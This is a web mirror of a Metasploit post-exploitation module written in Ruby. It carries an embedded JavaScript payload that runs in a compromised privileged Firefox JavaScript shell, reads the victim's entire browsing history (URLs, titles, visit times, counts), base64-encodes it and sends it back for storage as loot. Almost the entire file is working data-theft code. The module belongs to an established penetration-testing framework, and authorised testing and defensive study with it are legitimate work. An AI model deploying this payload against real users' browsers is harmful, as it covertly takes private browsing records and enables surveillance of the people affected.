CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/firefox/gather/history.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'json'

7


8
class MetasploitModule < Msf::Post

9
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Firefox Gather History from Privileged Javascript Shell',

16
        'Description' => %q{

17
          This module allows collection of the entire browser history from a Firefox

18
          Privileged Javascript Shell.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Author' => [ 'joev' ],

22
        'DisclosureDate' => '2014-04-11'

23
      )

24
    )

25


26
    register_options([

27
      OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])

28
    ])

29
  end

30


31
  def run

32
    results = js_exec(js_payload)

33
    if results.present?

34
      begin

35
        history = JSON.parse(results)

36
        history.each do |entry|

37
          entry.each_key { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }

38
        end

39


40
        file = store_loot('firefox.history.json', 'text/json', rhost, history.to_json)

41
        print_good("Saved #{history.length} history entries to #{file}")

42
      rescue JSON::ParserError => e

43
        print_warning(results)

44
      end

45
    end

46
  end

47


48
  def js_payload

49
    %|

50
      (function(send){

51
        try {

52
          var service = Components

53
                .classes["@mozilla.org/browser/nav-history-service;1"]

54
                .getService(Components.interfaces.nsINavHistoryService);

55
          var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;

56


57
          var query = service.getNewQuery();

58
          var options = service.getNewQueryOptions();

59
          var result = service.executeQuery(query, options);

60
          var fields = [];

61
          var entries = [];

62


63
          var root = result.root;

64
          root.containerOpen = true;

65


66
          for (var i = 0; i < result.root.childCount; ++i) {

67
            var child = result.root.getChild(i);

68
            if (child.type == child.RESULT_TYPE_URI) {

69
              entries.push({

70
                uri: b64(child.uri),

71
                title: b64(child.title),

72
                time: b64(child.time),

73
                accessCount: b64(child.accessCount)

74
              });

75
            }

76
          }

77


78
          result.root.containerOpen = false;

79


80
          send(JSON.stringify(entries));

81
        } catch (e) {

82
          send(e);

83
        }

84
      })(this.send);

85
    |.strip

86
  end

87
end

88


89